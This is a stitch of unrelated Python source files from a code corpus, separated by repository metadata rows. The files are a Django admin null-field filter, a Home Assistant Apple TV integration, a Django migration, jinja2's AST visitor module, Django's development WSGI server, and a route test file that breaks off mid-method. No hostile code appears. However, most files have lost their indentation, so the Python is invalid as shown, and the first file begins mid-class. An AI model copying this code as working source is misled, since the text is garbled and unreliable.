def value(self):
return self.used_parameters.get(self.lookup_kwarg, None)
def lookups(self, request, model_admin):
return (
('1', _('Yes')),
('0', _('No')),
)
def choices(self, cl):
yield {
'selected': self.value() is None,
'query_string': cl.get_query_string({}, [self.lookup_kwarg]),
'display': _('All'),
}
for lookup, title in self.lookup_choices:
yield {
'selected': self.value() == prepare_lookup_value(self.lookup_kwarg, lookup),
'query_string': cl.get_query_string({
self.lookup_kwarg: lookup,
}, []),
'display': title,
}
def queryset(self, request, queryset):
if self.value() is not None:
kwargs = {self.lookup_kwarg: self.value()}
return queryset.filter(**kwargs)
return queryset
class NotNullFieldListFilter(NullFieldListFilter):
def lookups(self, request, model_admin):
return (
('0', _('Yes')),
('1', _('No')),
)
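# --- Editor's sketch: hooking the filters into a ModelAdmin ---
# (the model and its date fields are hypothetical):
from django.contrib import admin

class _ExampleBookAdmin(admin.ModelAdmin):
    # Adds Yes/No sidebar filters on whether the date fields are NULL.
    list_filter = (
        ('published_at', NullFieldListFilter),
        ('reviewed_at', NotNullFieldListFilter),
    )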
| mit | 5,439,272,784,419,594,000 | 32.847458 | 105 | 0.585879 | false |
Zac-HD/home-assistant | homeassistant/components/media_player/apple_tv.py | 3 | 9307 | """
Support for Apple TV.
For more details about this platform, please refer to the documentation at
https://home-assistant.io/components/media_player.apple_tv/
"""
import asyncio
import logging
import hashlib
import aiohttp
import voluptuous as vol
from homeassistant.core import callback
from homeassistant.components.media_player import (
SUPPORT_NEXT_TRACK, SUPPORT_PAUSE, SUPPORT_PREVIOUS_TRACK, SUPPORT_SEEK,
SUPPORT_STOP, SUPPORT_PLAY, SUPPORT_PLAY_MEDIA, SUPPORT_TURN_ON,
SUPPORT_TURN_OFF, MediaPlayerDevice, PLATFORM_SCHEMA, MEDIA_TYPE_MUSIC,
MEDIA_TYPE_VIDEO, MEDIA_TYPE_TVSHOW)
from homeassistant.const import (
STATE_IDLE, STATE_PAUSED, STATE_PLAYING, STATE_STANDBY, CONF_HOST,
STATE_OFF, CONF_NAME)
from homeassistant.helpers.aiohttp_client import async_get_clientsession
import homeassistant.helpers.config_validation as cv
import homeassistant.util.dt as dt_util
REQUIREMENTS = ['pyatv==0.1.4']
_LOGGER = logging.getLogger(__name__)
CONF_LOGIN_ID = 'login_id'
CONF_START_OFF = 'start_off'
DEFAULT_NAME = 'Apple TV'
DATA_APPLE_TV = 'apple_tv'
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend({
vol.Required(CONF_HOST): cv.string,
vol.Required(CONF_LOGIN_ID): cv.string,
vol.Optional(CONF_NAME, default=DEFAULT_NAME): cv.string,
vol.Optional(CONF_START_OFF, default=False): cv.boolean
})
@asyncio.coroutine
def async_setup_platform(hass, config, async_add_entities,
discovery_info=None):
"""Setup the Apple TV platform."""
import pyatv
if discovery_info is not None:
name = discovery_info['name']
host = discovery_info['host']
login_id = discovery_info['hsgid']
start_off = False
else:
name = config.get(CONF_NAME)
host = config.get(CONF_HOST)
login_id = config.get(CONF_LOGIN_ID)
start_off = config.get(CONF_START_OFF)
if DATA_APPLE_TV not in hass.data:
hass.data[DATA_APPLE_TV] = []
if host in hass.data[DATA_APPLE_TV]:
return False
hass.data[DATA_APPLE_TV].append(host)
details = pyatv.AppleTVDevice(name, host, login_id)
session = async_get_clientsession(hass)
atv = pyatv.connect_to_apple_tv(details, hass.loop, session=session)
entity = AppleTvDevice(atv, name, start_off)
yield from async_add_entities([entity], update_before_add=True)
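# --- Editor's note: example configuration.yaml entry for this platform ---
# (host and login_id values are placeholders):
#
# media_player:
#   - platform: apple_tv
#     host: 192.168.1.10
#     login_id: 00000000-1111-2222-3333-444444444444
#     name: Living Room
#     start_off: true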
class AppleTvDevice(MediaPlayerDevice):
"""Representation of an Apple TV device."""
def __init__(self, atv, name, is_off):
"""Initialize the Apple TV device."""
self._atv = atv
self._name = name
self._is_off = is_off
self._playing = None
self._artwork_hash = None
@callback
def _set_power_off(self, is_off):
self._playing = None
self._artwork_hash = None
self._is_off = is_off
@property
def name(self):
"""Return the name of the device."""
return self._name
@property
def state(self):
"""Return the state of the device."""
if self._is_off:
return STATE_OFF
if self._playing is not None:
from pyatv import const
state = self._playing.play_state
if state == const.PLAY_STATE_NO_MEDIA:
return STATE_IDLE
elif state == const.PLAY_STATE_PLAYING or \
state == const.PLAY_STATE_LOADING:
return STATE_PLAYING
elif state == const.PLAY_STATE_PAUSED or \
state == const.PLAY_STATE_FAST_FORWARD or \
state == const.PLAY_STATE_FAST_BACKWARD:
# Catch fast forward/backward here so "play" is default action
return STATE_PAUSED
else:
return STATE_STANDBY # Bad or unknown state?
@asyncio.coroutine
def async_update(self):
"""Retrieve latest state."""
if self._is_off:
return
from pyatv import exceptions
try:
playing = yield from self._atv.metadata.playing()
if self._has_playing_media_changed(playing):
base = str(playing.title) + str(playing.artist) + \
str(playing.album) + str(playing.total_time)
self._artwork_hash = hashlib.md5(
base.encode('utf-8')).hexdigest()
self._playing = playing
except exceptions.AuthenticationError as ex:
_LOGGER.warning('%s (bad login id?)', str(ex))
except aiohttp.errors.ClientOSError as ex:
_LOGGER.error('failed to connect to Apple TV (%s)', str(ex))
except asyncio.TimeoutError:
_LOGGER.warning('timed out while connecting to Apple TV')
def _has_playing_media_changed(self, new_playing):
if self._playing is None:
return True
old_playing = self._playing
return new_playing.media_type != old_playing.media_type or \
new_playing.title != old_playing.title
@property
def media_content_type(self):
"""Content type of current playing media."""
if self._playing is not None:
from pyatv import const
media_type = self._playing.media_type
if media_type == const.MEDIA_TYPE_VIDEO:
return MEDIA_TYPE_VIDEO
elif media_type == const.MEDIA_TYPE_MUSIC:
return MEDIA_TYPE_MUSIC
elif media_type == const.MEDIA_TYPE_TV:
return MEDIA_TYPE_TVSHOW
@property
def media_duration(self):
"""Duration of current playing media in seconds."""
if self._playing is not None:
return self._playing.total_time
@property
def media_position(self):
"""Position of current playing media in seconds."""
if self._playing is not None:
return self._playing.position
@property
def media_position_updated_at(self):
"""Last valid time of media position."""
state = self.state
if state == STATE_PLAYING or state == STATE_PAUSED:
return dt_util.utcnow()
@asyncio.coroutine
def async_play_media(self, media_type, media_id, **kwargs):
"""Send the play_media command to the media player."""
yield from self._atv.remote_control.play_url(media_id, 0)
@property
def media_image_hash(self):
"""Hash value for media image."""
return self._artwork_hash
@asyncio.coroutine
def async_get_media_image(self):
"""Fetch media image of current playing image."""
return (yield from self._atv.metadata.artwork()), 'image/png'
@property
def media_title(self):
"""Title of current playing media."""
if self._playing is not None:
if self.state == STATE_IDLE:
return 'Nothing playing'
title = self._playing.title
return title if title else "No title"
@property
def supported_features(self):
"""Flag media player features that are supported."""
features = SUPPORT_TURN_ON | SUPPORT_TURN_OFF | SUPPORT_PLAY_MEDIA
if self._playing is None or self.state == STATE_IDLE:
return features
features |= SUPPORT_PAUSE | SUPPORT_PLAY | SUPPORT_SEEK | \
SUPPORT_STOP | SUPPORT_NEXT_TRACK | SUPPORT_PREVIOUS_TRACK
return features
@asyncio.coroutine
def async_turn_on(self):
"""Turn the media player on."""
self._set_power_off(False)
@asyncio.coroutine
def async_turn_off(self):
"""Turn the media player off."""
self._set_power_off(True)
def async_media_play_pause(self):
"""Pause media on media player.
This method must be run in the event loop and returns a coroutine.
"""
if self._playing is not None:
state = self.state
if state == STATE_PAUSED:
return self._atv.remote_control.play()
elif state == STATE_PLAYING:
return self._atv.remote_control.pause()
def async_media_play(self):
"""Play media.
This method must be run in the event loop and returns a coroutine.
"""
if self._playing is not None:
return self._atv.remote_control.play()
def async_media_pause(self):
"""Pause the media player.
This method must be run in the event loop and returns a coroutine.
"""
if self._playing is not None:
return self._atv.remote_control.pause()
def async_media_next_track(self):
"""Send next track command.
This method must be run in the event loop and returns a coroutine.
"""
if self._playing is not None:
return self._atv.remote_control.next()
def async_media_previous_track(self):
"""Send previous track command.
This method must be run in the event loop and returns a coroutine.
"""
if self._playing is not None:
return self._atv.remote_control.previous()
def async_media_seek(self, position):
"""Send seek command.
This method must be run in the event loop and returns a coroutine.
"""
if self._playing is not None:
return self._atv.remote_control.set_position(position)
| apache-2.0 | -5,281,340,171,427,332,000 | 32.003546 | 78 | 0.611368 | false |
thrive-refugee/thrive-refugee | donors/migrations/0005_auto_20141108_1219.py | 1 | 1067 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
import datetime
class Migration(migrations.Migration):
dependencies = [
('donors', '0004_auto_20141108_1110'),
]
operations = [
migrations.CreateModel(
name='Donation',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('when', models.DateField(default=datetime.date.today)),
('amount', models.DecimalField(max_digits=11, decimal_places=2)),
('memo', models.CharField(max_length=256, blank=True)),
('donor', models.ForeignKey(to='donors.Donor')),
],
options={
},
bases=(models.Model,),
),
migrations.RemoveField(
model_name='donor',
name='last_amount',
),
migrations.RemoveField(
model_name='donor',
name='last_donation',
),
]
| mit | 4,993,764,627,107,552,000 | 28.638889 | 114 | 0.535145 | false |
davidvon/pipa-pay-server | site-packages/jinja2/visitor.py | 1401 | 3316 | # -*- coding: utf-8 -*-
"""
jinja2.visitor
~~~~~~~~~~~~~~
This module implements a visitor for the nodes.
:copyright: (c) 2010 by the Jinja Team.
:license: BSD.
"""
from jinja2.nodes import Node
class NodeVisitor(object):
"""Walks the abstract syntax tree and call visitor functions for every
node found. The visitor functions may return values which will be
forwarded by the `visit` method.
Per default the visitor functions for the nodes are ``'visit_'`` +
class name of the node. So a `TryFinally` node visit function would
be `visit_TryFinally`. This behavior can be changed by overriding
the `get_visitor` function. If no visitor function exists for a node
(return value `None`) the `generic_visit` visitor is used instead.
"""
def get_visitor(self, node):
"""Return the visitor function for this node or `None` if no visitor
exists for this node. In that case the generic visit function is
used instead.
"""
method = 'visit_' + node.__class__.__name__
return getattr(self, method, None)
def visit(self, node, *args, **kwargs):
"""Visit a node."""
f = self.get_visitor(node)
if f is not None:
return f(node, *args, **kwargs)
return self.generic_visit(node, *args, **kwargs)
def generic_visit(self, node, *args, **kwargs):
"""Called if no explicit visitor function exists for a node."""
for node in node.iter_child_nodes():
self.visit(node, *args, **kwargs)
class NodeTransformer(NodeVisitor):
"""Walks the abstract syntax tree and allows modifications of nodes.
The `NodeTransformer` will walk the AST and use the return value of the
visitor functions to replace or remove the old node. If the return
value of the visitor function is `None` the node will be removed
from the previous location otherwise it's replaced with the return
value. The return value may be the original node in which case no
replacement takes place.
"""
def generic_visit(self, node, *args, **kwargs):
for field, old_value in node.iter_fields():
if isinstance(old_value, list):
new_values = []
for value in old_value:
if isinstance(value, Node):
value = self.visit(value, *args, **kwargs)
if value is None:
continue
elif not isinstance(value, Node):
new_values.extend(value)
continue
new_values.append(value)
old_value[:] = new_values
elif isinstance(old_value, Node):
new_node = self.visit(old_value, *args, **kwargs)
if new_node is None:
delattr(node, field)
else:
setattr(node, field, new_node)
return node
def visit_list(self, node, *args, **kwargs):
"""As transformers may return lists in some places this method
can be used to enforce a list as return value.
"""
rv = self.visit(node, *args, **kwargs)
if not isinstance(rv, list):
rv = [rv]
return rv
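# --- Editor's sketch: a minimal concrete visitor (illustrative only) ---
class _NameCollector(NodeVisitor):
    """Collect the names referenced anywhere in a template AST."""

    def __init__(self):
        self.names = []

    def visit_Name(self, node, *args, **kwargs):
        self.names.append(node.name)
        self.generic_visit(node, *args, **kwargs)

# Usage (sketch): collector = _NameCollector();
# collector.visit(env.parse(source)), then inspect collector.names;
# `env` is a jinja2.Environment.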
| apache-2.0 | 4,152,995,269,863,771,000 | 37.114943 | 76 | 0.584741 | false |
isaac-philip/loolu | common/django/core/servers/basehttp.py | 9 | 25759 | """
BaseHTTPServer that implements the Python WSGI protocol (PEP 333, rev 1.21).
Adapted from wsgiref.simple_server: http://svn.eby-sarna.com/wsgiref/
This is a simple server for use in testing or debugging Django apps. It hasn't
been reviewed for security issues. Don't use it for production use.
"""
from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
import mimetypes
import os
import re
import stat
import sys
import urllib
from django.utils.http import http_date
from django.utils._os import safe_join
__version__ = "0.1"
__all__ = ['WSGIServer','WSGIRequestHandler']
server_version = "WSGIServer/" + __version__
sys_version = "Python/" + sys.version.split()[0]
software_version = server_version + ' ' + sys_version
class WSGIServerException(Exception):
pass
class FileWrapper(object):
"""Wrapper to convert file-like objects to iterables"""
def __init__(self, filelike, blksize=8192):
self.filelike = filelike
self.blksize = blksize
if hasattr(filelike,'close'):
self.close = filelike.close
def __getitem__(self,key):
data = self.filelike.read(self.blksize)
if data:
return data
raise IndexError
def __iter__(self):
return self
def next(self):
data = self.filelike.read(self.blksize)
if data:
return data
raise StopIteration
# Regular expression that matches `special' characters in parameters, the
# existence of which force quoting of the parameter value.
tspecials = re.compile(r'[ \(\)<>@,;:\\"/\[\]\?=]')
def _formatparam(param, value=None, quote=1):
"""Convenience function to format and return a key=value pair.
This will quote the value if needed or if quote is true.
"""
if value is not None and len(value) > 0:
if quote or tspecials.search(value):
value = value.replace('\\', '\\\\').replace('"', r'\"')
return '%s="%s"' % (param, value)
else:
return '%s=%s' % (param, value)
else:
return param
class Headers(object):
"""Manage a collection of HTTP response headers"""
def __init__(self,headers):
if not isinstance(headers, list):
raise TypeError("Headers must be a list of name/value tuples")
self._headers = headers
def __len__(self):
"""Return the total number of headers, including duplicates."""
return len(self._headers)
def __setitem__(self, name, val):
"""Set the value of a header."""
del self[name]
self._headers.append((name, val))
def __delitem__(self,name):
"""Delete all occurrences of a header, if present.
Does *not* raise an exception if the header is missing.
"""
name = name.lower()
        self._headers[:] = [kv for kv in self._headers if kv[0].lower() != name]
def __getitem__(self,name):
"""Get the first header value for 'name'
Return None if the header is missing instead of raising an exception.
        Note that if the header appeared multiple times, exactly which
        occurrence gets returned is undefined.  Use get_all() to get all
        the values matching a header field name.
"""
return self.get(name)
def has_key(self, name):
"""Return true if the message contains the header."""
return self.get(name) is not None
__contains__ = has_key
def get_all(self, name):
"""Return a list of all the values for the named field.
These will be sorted in the order they appeared in the original header
list or were added to this instance, and may contain duplicates. Any
fields deleted and re-inserted are always appended to the header list.
If no fields exist with the given name, returns an empty list.
"""
name = name.lower()
return [kv[1] for kv in self._headers if kv[0].lower()==name]
def get(self,name,default=None):
"""Get the first header value for 'name', or return 'default'"""
name = name.lower()
for k,v in self._headers:
if k.lower()==name:
return v
return default
def keys(self):
"""Return a list of all the header field names.
These will be sorted in the order they appeared in the original header
list, or were added to this instance, and may contain duplicates.
Any fields deleted and re-inserted are always appended to the header
list.
"""
return [k for k, v in self._headers]
def values(self):
"""Return a list of all header values.
These will be sorted in the order they appeared in the original header
list, or were added to this instance, and may contain duplicates.
Any fields deleted and re-inserted are always appended to the header
list.
"""
return [v for k, v in self._headers]
def items(self):
"""Get all the header fields and values.
These will be sorted in the order they were in the original header
list, or were added to this instance, and may contain duplicates.
Any fields deleted and re-inserted are always appended to the header
list.
"""
return self._headers[:]
def __repr__(self):
return "Headers(%s)" % `self._headers`
def __str__(self):
"""str() returns the formatted headers, complete with end line,
suitable for direct HTTP transmission."""
return '\r\n'.join(["%s: %s" % kv for kv in self._headers]+['',''])
def setdefault(self,name,value):
"""Return first matching header value for 'name', or 'value'
If there is no header named 'name', add a new header with name 'name'
and value 'value'."""
result = self.get(name)
if result is None:
self._headers.append((name,value))
return value
else:
return result
def add_header(self, _name, _value, **_params):
"""Extended header setting.
_name is the header field to add. keyword arguments can be used to set
additional parameters for the header field, with underscores converted
to dashes. Normally the parameter will be added as key="value" unless
value is None, in which case only the key will be added.
Example:
h.add_header('content-disposition', 'attachment', filename='bud.gif')
Note that unlike the corresponding 'email.Message' method, this does
*not* handle '(charset, language, value)' tuples: all values must be
strings or None.
"""
parts = []
if _value is not None:
parts.append(_value)
for k, v in _params.items():
if v is None:
parts.append(k.replace('_', '-'))
else:
parts.append(_formatparam(k.replace('_', '-'), v))
self._headers.append((_name, "; ".join(parts)))
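def _headers_demo():
    # Editor's sketch: typical Headers usage (not used by the server itself).
    h = Headers([('Content-Type', 'text/plain')])
    h['Content-Length'] = '0'
    h.add_header('Content-Disposition', 'attachment', filename='log.txt')
    return str(h)  # formatted header block, ready for transmission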
def guess_scheme(environ):
"""Return a guess for whether 'wsgi.url_scheme' should be 'http' or 'https'
"""
if environ.get("HTTPS") in ('yes','on','1'):
return 'https'
else:
return 'http'
_hop_headers = {
'connection':1, 'keep-alive':1, 'proxy-authenticate':1,
'proxy-authorization':1, 'te':1, 'trailers':1, 'transfer-encoding':1,
'upgrade':1
}
def is_hop_by_hop(header_name):
"""Return true if 'header_name' is an HTTP/1.1 "Hop-by-Hop" header"""
return header_name.lower() in _hop_headers
class ServerHandler(object):
"""Manage the invocation of a WSGI application"""
# Configuration parameters; can override per-subclass or per-instance
wsgi_version = (1,0)
wsgi_multithread = True
wsgi_multiprocess = True
wsgi_run_once = False
origin_server = True # We are transmitting direct to client
http_version = "1.0" # Version that should be used for response
server_software = software_version
# os_environ is used to supply configuration from the OS environment:
# by default it's a copy of 'os.environ' as of import time, but you can
# override this in e.g. your __init__ method.
os_environ = dict(os.environ.items())
# Collaborator classes
wsgi_file_wrapper = FileWrapper # set to None to disable
headers_class = Headers # must be a Headers-like class
# Error handling (also per-subclass or per-instance)
traceback_limit = None # Print entire traceback to self.get_stderr()
error_status = "500 INTERNAL SERVER ERROR"
error_headers = [('Content-Type','text/plain')]
# State variables (don't mess with these)
status = result = None
headers_sent = False
headers = None
bytes_sent = 0
def __init__(self, stdin, stdout, stderr, environ, multithread=True,
multiprocess=False):
self.stdin = stdin
self.stdout = stdout
self.stderr = stderr
self.base_env = environ
self.wsgi_multithread = multithread
self.wsgi_multiprocess = multiprocess
def run(self, application):
"""Invoke the application"""
# Note to self: don't move the close()! Asynchronous servers shouldn't
# call close() from finish_response(), so if you close() anywhere but
# the double-error branch here, you'll break asynchronous servers by
# prematurely closing. Async servers must return from 'run()' without
# closing if there might still be output to iterate over.
try:
self.setup_environ()
self.result = application(self.environ, self.start_response)
self.finish_response()
except:
try:
self.handle_error()
except:
# If we get an error handling an error, just give up already!
self.close()
raise # ...and let the actual server figure it out.
def setup_environ(self):
"""Set up the environment for one request"""
env = self.environ = self.os_environ.copy()
self.add_cgi_vars()
env['wsgi.input'] = self.get_stdin()
env['wsgi.errors'] = self.get_stderr()
env['wsgi.version'] = self.wsgi_version
env['wsgi.run_once'] = self.wsgi_run_once
env['wsgi.url_scheme'] = self.get_scheme()
env['wsgi.multithread'] = self.wsgi_multithread
env['wsgi.multiprocess'] = self.wsgi_multiprocess
if self.wsgi_file_wrapper is not None:
env['wsgi.file_wrapper'] = self.wsgi_file_wrapper
if self.origin_server and self.server_software:
env.setdefault('SERVER_SOFTWARE',self.server_software)
def finish_response(self):
"""
Send any iterable data, then close self and the iterable
Subclasses intended for use in asynchronous servers will want to
redefine this method, such that it sets up callbacks in the event loop
to iterate over the data, and to call 'self.close()' once the response
is finished.
"""
if not self.result_is_file() or not self.sendfile():
for data in self.result:
self.write(data)
self.finish_content()
self.close()
def get_scheme(self):
"""Return the URL scheme being used"""
return guess_scheme(self.environ)
def set_content_length(self):
"""Compute Content-Length or switch to chunked encoding if possible"""
try:
blocks = len(self.result)
except (TypeError, AttributeError, NotImplementedError):
pass
else:
if blocks==1:
self.headers['Content-Length'] = str(self.bytes_sent)
return
# XXX Try for chunked encoding if origin server and client is 1.1
def cleanup_headers(self):
"""Make any necessary header changes or defaults
Subclasses can extend this to add other defaults.
"""
if 'Content-Length' not in self.headers:
self.set_content_length()
def start_response(self, status, headers,exc_info=None):
"""'start_response()' callable as specified by PEP 333"""
if exc_info:
try:
if self.headers_sent:
# Re-raise original exception if headers sent
raise exc_info[0], exc_info[1], exc_info[2]
finally:
exc_info = None # avoid dangling circular ref
elif self.headers is not None:
raise AssertionError("Headers already set!")
assert isinstance(status, str),"Status must be a string"
assert len(status)>=4,"Status must be at least 4 characters"
assert int(status[:3]),"Status message must begin w/3-digit code"
assert status[3]==" ", "Status message must have a space after code"
if __debug__:
for name,val in headers:
assert isinstance(name, str),"Header names must be strings"
assert isinstance(val, str),"Header values must be strings"
assert not is_hop_by_hop(name),"Hop-by-hop headers not allowed"
self.status = status
self.headers = self.headers_class(headers)
return self.write
def send_preamble(self):
"""Transmit version/status/date/server, via self._write()"""
if self.origin_server:
if self.client_is_modern():
self._write('HTTP/%s %s\r\n' % (self.http_version,self.status))
if 'Date' not in self.headers:
self._write(
'Date: %s\r\n' % http_date()
)
if self.server_software and 'Server' not in self.headers:
self._write('Server: %s\r\n' % self.server_software)
else:
self._write('Status: %s\r\n' % self.status)
def write(self, data):
"""'write()' callable as specified by PEP 333"""
assert isinstance(data, str), "write() argument must be string"
if not self.status:
raise AssertionError("write() before start_response()")
elif not self.headers_sent:
# Before the first output, send the stored headers
self.bytes_sent = len(data) # make sure we know content-length
self.send_headers()
else:
self.bytes_sent += len(data)
# XXX check Content-Length and truncate if too many bytes written?
# If data is too large, socket will choke, so write chunks no larger
# than 32MB at a time.
length = len(data)
if length > 33554432:
offset = 0
while offset < length:
                chunk_size = min(33554432, length - offset)
self._write(data[offset:offset+chunk_size])
self._flush()
offset += chunk_size
else:
self._write(data)
self._flush()
def sendfile(self):
"""Platform-specific file transmission
Override this method in subclasses to support platform-specific
file transmission. It is only called if the application's
return iterable ('self.result') is an instance of
'self.wsgi_file_wrapper'.
This method should return a true value if it was able to actually
transmit the wrapped file-like object using a platform-specific
approach. It should return a false value if normal iteration
should be used instead. An exception can be raised to indicate
that transmission was attempted, but failed.
NOTE: this method should call 'self.send_headers()' if
'self.headers_sent' is false and it is going to attempt direct
        transmission of the file.
"""
return False # No platform-specific transmission by default
def finish_content(self):
"""Ensure headers and content have both been sent"""
if not self.headers_sent:
self.headers['Content-Length'] = "0"
self.send_headers()
else:
pass # XXX check if content-length was too short?
def close(self):
try:
self.request_handler.log_request(self.status.split(' ',1)[0], self.bytes_sent)
finally:
try:
if hasattr(self.result,'close'):
self.result.close()
finally:
self.result = self.headers = self.status = self.environ = None
self.bytes_sent = 0; self.headers_sent = False
def send_headers(self):
"""Transmit headers to the client, via self._write()"""
self.cleanup_headers()
self.headers_sent = True
if not self.origin_server or self.client_is_modern():
self.send_preamble()
self._write(str(self.headers))
def result_is_file(self):
"""True if 'self.result' is an instance of 'self.wsgi_file_wrapper'"""
wrapper = self.wsgi_file_wrapper
return wrapper is not None and isinstance(self.result,wrapper)
def client_is_modern(self):
"""True if client can accept status and headers"""
return self.environ['SERVER_PROTOCOL'].upper() != 'HTTP/0.9'
def log_exception(self,exc_info):
"""Log the 'exc_info' tuple in the server log
Subclasses may override to retarget the output or change its format.
"""
try:
from traceback import print_exception
stderr = self.get_stderr()
print_exception(
exc_info[0], exc_info[1], exc_info[2],
self.traceback_limit, stderr
)
stderr.flush()
finally:
exc_info = None
def handle_error(self):
"""Log current error, and send error output to client if possible"""
self.log_exception(sys.exc_info())
if not self.headers_sent:
self.result = self.error_output(self.environ, self.start_response)
self.finish_response()
# XXX else: attempt advanced recovery techniques for HTML or text?
def error_output(self, environ, start_response):
import traceback
start_response(self.error_status, self.error_headers[:], sys.exc_info())
return ['\n'.join(traceback.format_exception(*sys.exc_info()))]
# Pure abstract methods; *must* be overridden in subclasses
def _write(self,data):
self.stdout.write(data)
self._write = self.stdout.write
def _flush(self):
self.stdout.flush()
self._flush = self.stdout.flush
def get_stdin(self):
return self.stdin
def get_stderr(self):
return self.stderr
def add_cgi_vars(self):
self.environ.update(self.base_env)
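def _demo_app(environ, start_response):
    """Editor's sketch: the smallest WSGI application this handler can run."""
    start_response('200 OK', [('Content-Type', 'text/plain')])
    return ['Hello, WSGI!\n']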
class WSGIServer(HTTPServer):
"""BaseHTTPServer that implements the Python WSGI protocol"""
application = None
def server_bind(self):
"""Override server_bind to store the server name."""
try:
HTTPServer.server_bind(self)
except Exception, e:
raise WSGIServerException, e
self.setup_environ()
def setup_environ(self):
# Set up base environment
env = self.base_environ = {}
env['SERVER_NAME'] = self.server_name
env['GATEWAY_INTERFACE'] = 'CGI/1.1'
env['SERVER_PORT'] = str(self.server_port)
env['REMOTE_HOST']=''
env['CONTENT_LENGTH']=''
env['SCRIPT_NAME'] = ''
def get_app(self):
return self.application
def set_app(self,application):
self.application = application
class WSGIRequestHandler(BaseHTTPRequestHandler):
server_version = "WSGIServer/" + __version__
def __init__(self, *args, **kwargs):
from django.conf import settings
self.admin_media_prefix = settings.ADMIN_MEDIA_PREFIX
# We set self.path to avoid crashes in log_message() on unsupported
# requests (like "OPTIONS").
self.path = ''
BaseHTTPRequestHandler.__init__(self, *args, **kwargs)
def get_environ(self):
env = self.server.base_environ.copy()
env['SERVER_PROTOCOL'] = self.request_version
env['REQUEST_METHOD'] = self.command
if '?' in self.path:
path,query = self.path.split('?',1)
else:
path,query = self.path,''
env['PATH_INFO'] = urllib.unquote(path)
env['QUERY_STRING'] = query
env['REMOTE_ADDR'] = self.client_address[0]
if self.headers.typeheader is None:
env['CONTENT_TYPE'] = self.headers.type
else:
env['CONTENT_TYPE'] = self.headers.typeheader
length = self.headers.getheader('content-length')
if length:
env['CONTENT_LENGTH'] = length
for h in self.headers.headers:
k,v = h.split(':',1)
k=k.replace('-','_').upper(); v=v.strip()
if k in env:
                continue                    # skip content length, type, etc.
if 'HTTP_'+k in env:
env['HTTP_'+k] += ','+v # comma-separate multiple headers
else:
env['HTTP_'+k] = v
return env
def get_stderr(self):
return sys.stderr
def handle(self):
"""Handle a single HTTP request"""
self.raw_requestline = self.rfile.readline()
if not self.parse_request(): # An error code has been sent, just exit
return
handler = ServerHandler(self.rfile, self.wfile, self.get_stderr(), self.get_environ())
handler.request_handler = self # backpointer for logging
handler.run(self.server.get_app())
def log_message(self, format, *args):
# Don't bother logging requests for admin images or the favicon.
if self.path.startswith(self.admin_media_prefix) or self.path == '/favicon.ico':
return
sys.stderr.write("[%s] %s\n" % (self.log_date_time_string(), format % args))
class AdminMediaHandler(object):
"""
WSGI middleware that intercepts calls to the admin media directory, as
defined by the ADMIN_MEDIA_PREFIX setting, and serves those images.
Use this ONLY LOCALLY, for development! This hasn't been tested for
security and is not super efficient.
"""
def __init__(self, application, media_dir=None):
from django.conf import settings
self.application = application
if not media_dir:
import django
self.media_dir = \
os.path.join(django.__path__[0], 'contrib', 'admin', 'media')
else:
self.media_dir = media_dir
self.media_url = settings.ADMIN_MEDIA_PREFIX
def file_path(self, url):
"""
Returns the path to the media file on disk for the given URL.
The passed URL is assumed to begin with ADMIN_MEDIA_PREFIX. If the
resultant file path is outside the media directory, then a ValueError
is raised.
"""
# Remove ADMIN_MEDIA_PREFIX.
relative_url = url[len(self.media_url):]
relative_path = urllib.url2pathname(relative_url)
return safe_join(self.media_dir, relative_path)
def __call__(self, environ, start_response):
import os.path
# Ignore requests that aren't under ADMIN_MEDIA_PREFIX. Also ignore
# all requests if ADMIN_MEDIA_PREFIX isn't a relative URL.
if self.media_url.startswith('http://') or self.media_url.startswith('https://') \
or not environ['PATH_INFO'].startswith(self.media_url):
return self.application(environ, start_response)
# Find the admin file and serve it up, if it exists and is readable.
try:
file_path = self.file_path(environ['PATH_INFO'])
except ValueError: # Resulting file path was not valid.
status = '404 NOT FOUND'
headers = {'Content-type': 'text/plain'}
output = ['Page not found: %s' % environ['PATH_INFO']]
start_response(status, headers.items())
return output
if not os.path.exists(file_path):
status = '404 NOT FOUND'
headers = {'Content-type': 'text/plain'}
output = ['Page not found: %s' % environ['PATH_INFO']]
else:
try:
fp = open(file_path, 'rb')
except IOError:
status = '401 UNAUTHORIZED'
headers = {'Content-type': 'text/plain'}
output = ['Permission denied: %s' % environ['PATH_INFO']]
else:
# This is a very simple implementation of conditional GET with
# the Last-Modified header. It makes media files a bit speedier
# because the files are only read off disk for the first
# request (assuming the browser/client supports conditional
# GET).
mtime = http_date(os.stat(file_path)[stat.ST_MTIME])
headers = {'Last-Modified': mtime}
if environ.get('HTTP_IF_MODIFIED_SINCE', None) == mtime:
status = '304 NOT MODIFIED'
output = []
else:
status = '200 OK'
mime_type = mimetypes.guess_type(file_path)[0]
if mime_type:
headers['Content-Type'] = mime_type
output = [fp.read()]
fp.close()
start_response(status, headers.items())
return output
def run(addr, port, wsgi_handler):
server_address = (addr, port)
httpd = WSGIServer(server_address, WSGIRequestHandler)
httpd.set_app(wsgi_handler)
httpd.serve_forever()
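# Editor's sketch: serving an application locally (host/port are
# placeholders); blocks forever, so it is left commented out:
#
#     run('127.0.0.1', 8000, _demo_app)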
| mit | 5,280,051,249,911,472,000 | 35.904011 | 94 | 0.595015 | false |
ccowmu/whatistheplan.com | tests/test_routes.py | 1 | 1776 | from django.contrib.auth.models import User
from django.test import Client, TestCase
from django.core.urlresolvers import reverse
class RoutesTest(TestCase):
def setUp(self):
self.client = Client()
self.logged_in_client = Client()
self.user = User.objects.create_user("testuser", "[email protected]", "test_password")
self.logged_in_client.login(username="testuser", password="test_password")
def test_home_route(self):
"""Home returns 200"""
response = self.client.get(reverse('Home'))
self.assertEqual(response.status_code, 200)
def test_events_route(self):
"""Events returns 200"""
response = self.client.get(reverse('Events'))
self.assertEqual(response.status_code, 200)
def test_about_route(self):
"""About returns 200"""
response = self.client.get(reverse('About'))
self.assertEqual(response.status_code, 200)
    def test_twitch_route(self):
        """Twitch returns 200"""
        response = self.client.get(reverse('Twitch'))
self.assertEqual(response.status_code, 200)
def test_sign_up_route(self):
"""Sign Up returns 200"""
response = self.client.get(reverse('Sign Up'))
self.assertEqual(response.status_code, 200)
def test_log_in_route(self):
"""Log in returns 200"""
response = self.client.get(reverse('Log In'))
self.assertEqual(response.status_code, 200)
def test_log_out_route_for_logged_in_user(self):
"""Log Out redirects home for a logged in user"""
